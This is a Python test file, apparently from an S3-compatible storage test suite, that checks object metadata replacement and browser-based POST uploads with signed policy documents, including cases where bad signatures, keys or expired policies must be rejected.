@attr(assertion='replaces previous metadata')
def test_object_metadata_replaced_on_put():
bucket_name = get_new_bucket()
client = get_client()
metadata_dict = {'meta1': 'bar'}
client.put_object(Bucket=bucket_name, Key='foo', Body='bar', Metadata=metadata_dict)
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
got = response['Metadata']
eq(got, {})
@attr(resource='object')
@attr(method='put')
@attr(operation='data write from file (w/100-Continue)')
@attr(assertion='succeeds and returns written data')
def test_object_write_file():
bucket_name = get_new_bucket()
client = get_client()
data_str = 'bar'
data = bytes(data_str, 'utf-8')
client.put_object(Bucket=bucket_name, Key='foo', Body=data)
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
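# helper: build the URL ('<endpoint>/<bucket_name>') targeted by the
# browser-style POST upload tests that follow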
def _get_post_url(bucket_name):
endpoint = get_config_endpoint()
return '{endpoint}/{bucket_name}'.format(endpoint=endpoint, bucket_name=bucket_name)
@attr(resource='object')
@attr(method='post')
@attr(operation='anonymous browser based upload via POST request')
@attr(assertion='succeeds and returns written data')
def test_post_object_anonymous_request():
bucket_name = get_new_bucket_name()
client = get_client()
url = _get_post_url(bucket_name)
payload = OrderedDict([("key" , "foo.txt"),("acl" , "public-read"),\
("Content-Type" , "text/plain"),('file', ('bar'))])
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds and returns written data')
def test_post_object_authenticated_request():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
    bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
body = _get_body(response)
eq(body, 'bar')
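# The authenticated POST tests below each rebuild the same policy/signature
# boilerplate inline. A hypothetical helper along these lines (an illustrative
# sketch only; it is not used by the existing tests) captures the shared
# pattern of base64-encoding the policy document and signing it with the
# main credentials:
def _encode_and_sign_policy_sketch(policy_document):
    # serialize and base64-encode the policy document exactly as the tests do
    json_policy_document = json.JSONEncoder().encode(policy_document)
    policy = base64.b64encode(bytes(json_policy_document, 'utf-8'))
    # sign the encoded policy with HMAC-SHA1 using the main secret key
    aws_secret_access_key = get_main_aws_secret_key()
    signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
    return policy, signature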
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request, no content-type header')
@attr(assertion='succeeds and returns written data')
def test_post_object_authenticated_no_content_type():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key="foo.txt")
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request, bad access key')
@attr(assertion='fails')
def test_post_object_authenticated_request_bad_access_key():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , 'foo'),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 403)
@attr(resource='object')
@attr(method='post')
@attr(operation='anonymous browser based upload via POST request')
@attr(assertion='succeeds with status 201')
def test_post_object_set_success_code():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
url = _get_post_url(bucket_name)
payload = OrderedDict([("key" , "foo.txt"),("acl" , "public-read"),\
("success_action_status" , "201"),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 201)
message = ET.fromstring(r.content).find('Key')
eq(message.text,'foo.txt')
@attr(resource='object')
@attr(method='post')
@attr(operation='anonymous browser based upload via POST request')
@attr(assertion='succeeds with status 204')
def test_post_object_set_invalid_success_code():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
url = _get_post_url(bucket_name)
payload = OrderedDict([("key" , "foo.txt"),("acl" , "public-read"),\
("success_action_status" , "404"),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
content = r.content.decode()
eq(content,'')
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds and returns written data')
def test_post_object_upload_larger_than_chunk():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 5*1024*1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
foo_string = 'foo' * 1024*1024
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', foo_string)])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
body = _get_body(response)
eq(body, foo_string)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds and returns written data')
def test_post_object_set_key_from_filename():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "${filename}"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('foo.txt', 'bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds with status 204')
def test_post_object_ignored_header():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),("x-ignore-foo" , "bar"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds with status 204')
def test_post_object_case_insensitive_condition_fields():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bUcKeT": bucket_name},\
["StArTs-WiTh", "$KeY", "foo"],\
{"AcL": "private"},\
["StArTs-WiTh", "$CoNtEnT-TyPe", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
foo_string = 'foo' * 1024*1024
payload = OrderedDict([ ("kEy" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("aCl" , "private"),("signature" , signature),("pOLICy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds with escaped leading $ and returns written data')
def test_post_object_escaped_field_values():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "\$foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "\$foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='\$foo.txt')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds and returns redirect url')
def test_post_object_success_redirect_action():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
url = _get_post_url(bucket_name)
redirect_url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["eq", "$success_action_redirect", redirect_url],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),("success_action_redirect" , redirect_url),\
('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 200)
url = r.url
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
eq(url,
'{rurl}?bucket={bucket}&key={key}&etag=%22{etag}%22'.format(rurl = redirect_url,\
bucket = bucket_name, key = 'foo.txt', etag = response['ETag'].strip('"')))
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with invalid signature error')
def test_post_object_invalid_signature():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "\$foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())[::-1]
payload = OrderedDict([ ("key" , "\$foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 403)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with access key does not exist error')
def test_post_object_invalid_access_key():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "\$foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "\$foo.txt"),("AWSAccessKeyId" , aws_access_key_id[::-1]),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 403)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with invalid expiration error')
def test_post_object_invalid_date_format():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": str(expires),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "\$foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "\$foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with missing key error')
def test_post_object_no_key_specified():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with missing signature error')
def test_post_object_missing_signature():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "\$foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key", "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with extra input fields policy error')
def test_post_object_missing_policy_condition():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
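    # this policy deliberately omits the {"bucket": ...} condition, so the bucket field
    # sent with the POST is not covered by the policy and the upload is rejected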
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
["starts-with", "$key", "\$foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key", "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 403)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds using starts-with restriction on metadata header')
def test_post_object_user_specified_header():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024],\
["starts-with", "$x-amz-meta-foo", "bar"]
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key", "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('x-amz-meta-foo' , 'barclamp'),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
eq(response['Metadata']['foo'], 'barclamp')
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with policy condition failed error due to missing field in POST request')
def test_post_object_request_missing_policy_specified_field():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024],\
["starts-with", "$x-amz-meta-foo", "bar"]
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key", "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 403)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with conditions must be list error')
def test_post_object_condition_is_case_sensitive():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"CONDITIONS": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key", "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with expiration must be string error')
def test_post_object_expires_is_case_sensitive():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"EXPIRATION": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key", "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with policy expired error')
def test_post_object_expired_policy():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=-6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key", "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 403)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails using equality restriction on metadata header')
def test_post_object_invalid_request_field_value():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
